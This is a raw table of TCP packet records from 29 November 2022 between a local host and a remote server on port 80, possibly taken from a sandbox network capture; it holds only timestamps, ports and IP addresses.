Nov 29, 2022 08:13:05.972127914 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.972176075 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.972203016 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.972232103 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.972260952 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.972290039 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.972301006 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.972318888 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.972332001 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.972332001 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.972347975 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.972348928 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.972378016 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.972383976 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.972394943 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.972407103 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.972435951 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.972440958 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.972457886 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.972462893 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.972480059 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.972522020 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.972527981 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.972558022 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.972588062 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.972588062 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.972613096 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.972615957 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.972639084 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.972645998 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.972661018 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.972675085 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.972683907 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.972728014 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.973151922 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.973184109 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.973212004 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.973217964 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.973236084 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.973237038 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.973257065 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.973280907 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.973337889 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.973366022 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.973385096 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.973393917 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.973407030 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.973422050 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.973445892 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.973452091 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.973469019 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.973480940 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.973507881 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.973510027 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.973535061 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.973537922 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.973546982 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.973576069 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.973583937 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.973604918 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.973627090 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.973640919 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.973649025 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.973670006 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.973678112 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.973699093 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.973706961 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.973727942 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.973751068 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.973759890 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.973767996 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.973788977 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.973798037 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.973818064 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.973826885 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.973845959 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.973854065 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.973875046 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.973885059 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.973901033 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.973911047 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.973929882 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.973936081 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.973961115 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.973968983 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.973989964 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.973998070 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.974019051 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.974028111 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.974049091 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.974056005 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.974077940 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.974085093 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.974104881 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.974112034 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.974134922 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:05.974143982 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.974174023 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:05.979733944 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.093661070 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.093696117 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.093713045 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.093730927 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.093750954 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.093770027 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.093782902 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.093784094 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.093787909 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.093806982 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.093833923 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.093833923 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.093833923 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.093849897 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.100689888 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.100725889 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.100743055 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.100764036 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.100784063 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.100801945 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.100800991 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.100820065 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.100838900 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.100856066 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.100873947 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.100892067 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.100909948 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.100914001 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.100914001 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.100914001 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.100914001 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.100914001 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.100914001 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.100914001 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.100914001 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.100928068 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.100944042 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.100944042 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.100946903 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.100965023 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.100980997 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.100982904 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.101001024 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.101020098 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.101037025 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.101053953 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.101053953 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.101056099 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.101053953 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.101053953 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.101074934 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.101077080 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.101095915 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.101106882 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.101106882 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.101115942 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.101119995 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.101130009 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.101149082 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.101161003 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.101166964 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.101171970 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.101183891 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.101191998 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.101202965 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.101208925 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.101221085 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.101237059 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.101238966 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.101248026 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.101258039 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.101273060 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.101273060 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.101275921 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.101295948 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.101303101 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.101314068 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.101315022 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.101334095 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.101344109 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.101351976 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.101367950 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.101367950 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.101368904 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.101387024 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.101388931 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.101406097 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.101413965 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.101424932 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.101435900 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.101445913 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.101464987 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.101466894 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.101466894 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.101481915 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.101500034 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.102027893 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.215430021 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.215470076 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.215497971 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.215518951 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.215523958 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.215553999 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.215555906 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.215555906 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.215574980 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.215583086 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.215603113 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.215611935 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.215636015 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.215640068 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.215656996 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.215667009 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.215683937 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.215693951 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.215719938 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.215723038 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.215747118 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.215749025 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.215766907 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.215794086 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.216893911 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.216928005 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.216955900 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.216973066 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.216983080 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.216995955 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.217009068 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.217039108 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.222635984 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.222665071 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.222683907 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.222702026 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.222718954 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.222738981 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.222758055 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.222755909 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.222755909 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.222779989 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.222800016 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.222805977 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.222805977 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.222805977 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.222820044 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.222826958 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.222841024 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.222855091 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.222861052 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.222868919 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.222901106 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.222919941 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.222938061 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.222940922 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.222940922 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.222956896 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.222975969 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.222980976 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.222981930 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.222995043 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223012924 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223021984 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223021984 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223021984 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223032951 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223040104 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223053932 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223062038 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223073959 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223083019 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223093033 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223107100 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223112106 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223123074 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223133087 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223146915 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223153114 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223171949 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223189116 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223201990 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223211050 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223211050 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223228931 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223233938 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223238945 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223242044 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223257065 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223257065 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223275900 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223279953 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223292112 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223295927 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223315001 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223320961 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223334074 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223336935 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223352909 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223355055 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223373890 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223375082 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223392963 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223397017 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223411083 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223412991 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223431110 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223432064 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223452091 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223469019 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223470926 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223489046 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223498106 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223498106 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223507881 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223524094 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223527908 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223536968 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223548889 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223558903 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223567963 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223573923 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223588943 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223598957 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223608971 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223614931 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223628998 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223639965 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223649025 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223651886 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223669052 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223678112 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223687887 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223700047 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223706961 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223721981 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223726034 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223745108 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223746061 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223764896 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223771095 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223772049 CET	49173	80	192.168.2.22	172.245.34.91
Nov 29, 2022 08:13:06.223784924 CET	80	49173	172.245.34.91	192.168.2.22
Nov 29, 2022 08:13:06.223803043 CET	80	49173	172.245.34.91	192.168.2.22
